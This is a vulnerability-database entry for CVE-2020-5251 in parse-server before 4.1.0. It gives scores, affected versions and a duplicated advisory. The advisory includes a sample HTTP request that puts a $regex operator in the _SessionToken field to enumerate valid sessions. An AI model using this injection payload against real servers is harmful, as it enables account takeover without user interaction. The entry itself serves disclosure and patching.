CVE-2020-5251
published 2020-03-04CVE-2020-5251: In parser-server before version 4.1.0, you can fetch all the users objects, by using regex in the NoSQL query. Using the NoSQL, you can use a regex on…
PriorityP425medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
EPSS
0.85%
53.5th percentile
In parser-server before version 4.1.0, you can fetch all the users objects, by using regex in the NoSQL query. Using the NoSQL, you can use a regex on sessionToken and find valid accounts this way.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| parse-community | parse-server | < 4.1.0 | 4.1.0 |
| parse-community | parse-server | >= 0 < 4.1.0 | 4.1.0 |
| parseplatform | parse-server | < 4.1.0 | 4.1.0 |
CVSS provenance
nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Information disclosure in parse-server
osv·2020-03-04
CVE-2020-5251 [HIGH] Information disclosure in parse-server
Information disclosure in parse-server
1. you can fetch all the users' objects, by using regex in the NoSQL query.
Using the NoSQL, you can use a regex on sessionToken `("_SessionToken":{"$regex":"r:027f"}}` and find valid accounts this way.
Using this method, it's possible to retrieve accounts without interaction from the users.
GET /parse/users/me HTTP/1.1
```
{
"_ApplicationId": "appName",
"_JavaScriptKey": "javascriptkey",
"_ClientVersion": "js2.10.0",
"_InstallationId": "ca713ee2-6e60-d023-a8fe-14e1bfb2f300",
"_SessionToken": {
"$regex": "r:5"
}
}
```
When trying it with an update query the same thing luckily doesn't seem to work:
POST /parse/classes/_User/PPNk59jPPZ
2. There is another similar vulnerability in verify email and the request password reset.
If you sign up with some
GHSA
Information disclosure in parse-server
ghsa·2020-03-04
CVE-2020-5251 [HIGH] CWE-200 Information disclosure in parse-server
Information disclosure in parse-server
1. you can fetch all the users' objects, by using regex in the NoSQL query.
Using the NoSQL, you can use a regex on sessionToken `("_SessionToken":{"$regex":"r:027f"}}` and find valid accounts this way.
Using this method, it's possible to retrieve accounts without interaction from the users.
GET /parse/users/me HTTP/1.1
```
{
"_ApplicationId": "appName",
"_JavaScriptKey": "javascriptkey",
"_ClientVersion": "js2.10.0",
"_InstallationId": "ca713ee2-6e60-d023-a8fe-14e1bfb2f300",
"_SessionToken": {
"$regex": "r:5"
}
}
```
When trying it with an update query the same thing luckily doesn't seem to work:
POST /parse/classes/_User/PPNk59jPPZ
2. There is another similar vulnerability in verify email and the request password reset.
If you sign up with some
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/parse-community/parse-server/commit/3a3a5eee5ffa48da1352423312cb767de14de269https://github.com/parse-community/parse-server/security/advisories/GHSA-h4mf-75hf-67w4https://github.com/parse-community/parse-server/commit/3a3a5eee5ffa48da1352423312cb767de14de269https://github.com/parse-community/parse-server/security/advisories/GHSA-h4mf-75hf-67w4
2020-03-04
Published